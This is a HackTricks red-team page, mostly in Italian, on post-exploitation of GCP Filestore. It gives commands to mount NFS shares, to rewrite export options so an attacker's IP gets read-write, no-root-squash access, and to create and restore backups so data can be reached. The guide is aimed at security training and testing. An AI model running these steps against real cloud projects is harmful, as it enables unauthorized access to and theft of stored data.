GCP - Filestore Post Exploitation

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Filestore

Per ulteriori informazioni su Filestore controlla:

GCP - Filestore Enum

Mount Filestore

Un filesystem condiviso potrebbe contenere informazioni sensibili interessanti dal punto di vista di un attaccante. Con accesso a Filestore è possibile montarlo:

sudo apt-get update
sudo apt-get install nfs-common
# Check the share name
showmount -e <IP>
# Mount the share
mkdir /mnt/fs
sudo mount [FILESTORE_IP]:/[FILE_SHARE_NAME] /mnt/fs

Per trovare l'indirizzo IP di un'istanza di filestore, controlla la sezione di enumerazione della pagina:

GCP - Filestore Enum

Rimuovere le restrizioni e ottenere permessi extra

Se l'attaccante non si trova in un indirizzo IP con accesso alla condivisione, ma hai abbastanza permessi per modificarla, è possibile rimuovere le restrizioni o l'accesso su di essa. È anche possibile concedere più privilegi sul tuo indirizzo IP per avere accesso admin sulla condivisione:

gcloud filestore instances update nfstest \
--zone=<exact-zone> \
--flags-file=nfs.json

# Contents of nfs.json
{
"--file-share":
{
"capacity": "1024",
"name": "<share-name>",
"nfs-export-options": [
{
"access-mode": "READ_WRITE",
"ip-ranges": [
"<your-ip-private-address>/32"
],
"squash-mode": "NO_ROOT_SQUASH",
"anon_uid": 1003,
"anon_gid": 1003
}
]
}
}

Ripristina un backup

Se c'è un backup è possibile ripristinarlo in un'istanza esistente o in una nuova in modo che le sue informazioni diventino accessibili:

# Create a new filestore if you don't want to modify the old one
gcloud filestore instances create <new-instance-name> \
--zone=<zone> \
--tier=STANDARD \
--file-share=name=vol1,capacity=1TB \
--network=name=default,reserved-ip-range=10.0.0.0/29

# Restore a backups in a new instance
gcloud filestore instances restore <new-instance-name> \
--zone=<zone> \
--file-share=<instance-file-share-name> \
--source-backup=<backup-name> \
--source-backup-region=<backup-region>

# Follow the previous section commands to mount it

Crea un backup e ripristinalo

Se non hai accesso a una condivisione e non vuoi modificarla, è possibile creare un backup di essa e ripristinarlo come menzionato in precedenza:

# Create share backup
gcloud filestore backups create <back-name> \
--region=<region> \
--instance=<instance-name> \
--instance-zone=<instance-zone> \
--file-share=<share-name>

# Follow the previous section commands to restore it and mount it

Supporta HackTricks

Controlla i piani di abbonamento!
Unisciti al 💬 gruppo Discord o al gruppo telegram o seguici su Twitter 🐦 @hacktricks_live.
Condividi trucchi di hacking inviando PR ai HackTricks e HackTricks Cloud repos di github.

PreviousGCP - Compute Post Exploitation NextGCP - IAM Post Exploitation

Last updated 3 days ago